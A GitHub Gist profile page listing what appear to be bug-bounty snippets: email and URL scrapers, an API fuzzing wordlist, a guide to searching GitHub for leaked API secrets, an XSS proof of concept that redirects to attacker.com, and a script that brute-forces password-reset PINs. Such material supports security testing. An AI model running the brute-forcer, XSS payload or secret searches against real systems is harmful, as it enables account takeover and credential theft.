Skip to content

Instantly share code, notes, and snippets.

View betillogalvanfbc's full-sized avatar
:electron:
Don't give up!

Betillø Galvan betillogalvanfbc

:electron:
Don't give up!
42 followers · 759 following
View GitHub Profile
@betillogalvanfbc
betillogalvanfbc / s.js
Created September 29, 2023 19:24
s.js
console.log('XSS Poc!');setTimeout(() => window.location.href = 'https://attacker.com', 5000);
@betillogalvanfbc
betillogalvanfbc / ee.js
Created September 28, 2023 06:45
extract-emails
(function() {
const regex = /[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}/g;
const results = new Set();
async function fetchAndExtractEmails(url) {
try {
const response = await fetch(url);
const text = await response.text();
const matches = text.matchAll(regex);
for (const match of matches) {
@betillogalvanfbc
betillogalvanfbc / edu.js
Created September 28, 2023 06:44
extract-domains-urls.js
(function() {
const regexURL = /(https?:\/\/[^\s]+)/g; // Expresión regular para extraer URLs
const regexDomain = /https?:\/\/([^\s/]+)/; // Expresión regular para extraer dominios
const results = new Set();
async function fetchAndExtractUrls(url) {
try {
const response = await fetch(url);
const text = await response.text();
const matches = text.matchAll(regexURL);
@betillogalvanfbc
betillogalvanfbc / List of API endpoints & objects
Created September 19, 2023 21:58 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@betillogalvanfbc
betillogalvanfbc / GitHub-Leaked-API-Keys-and-Secrets.md
Created June 19, 2023 05:22 — forked from win3zz/GitHub-Leaked-API-Keys-and-Secrets.md

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

@betillogalvanfbc
betillogalvanfbc / frames.js
Created June 6, 2023 02:05
frames.js
for ( e in frames){
console.log(e)
}
@betillogalvanfbc
betillogalvanfbc / csp.js
Created June 6, 2023 01:58
csp.js
for ( e in window){
try {
if (window[e].hasOwnProperty('top') && window[e]['top'] === window){
console.log(e)
}
}catch (err){}
}
@betillogalvanfbc
betillogalvanfbc / main.js
Last active April 8, 2023 05:24
main.js
console.log('error');
@betillogalvanfbc
betillogalvanfbc / bruteforcepin.py
Created February 2, 2023 20:37
bruteforcepin.py
import asyncio
import aiohttp
async def crack_pin(prefix, session):
for i in range(10000):
pin = prefix + str(i).zfill(4)
async with session.post("http://localhost/resetpassword", data={"pin": pin}) as resp:
if resp.status == 200:
return pin
await asyncio.sleep(0.01)
@betillogalvanfbc
betillogalvanfbc / linkPreviewGenerator.js
Created January 23, 2023 21:38
linkPreviewGenerator.js
const linkPreviewGenerator = require("link-preview-generator");
async function run() {
const previewData = await linkPreviewGenerator("url");
console.log(previewData);
}
run();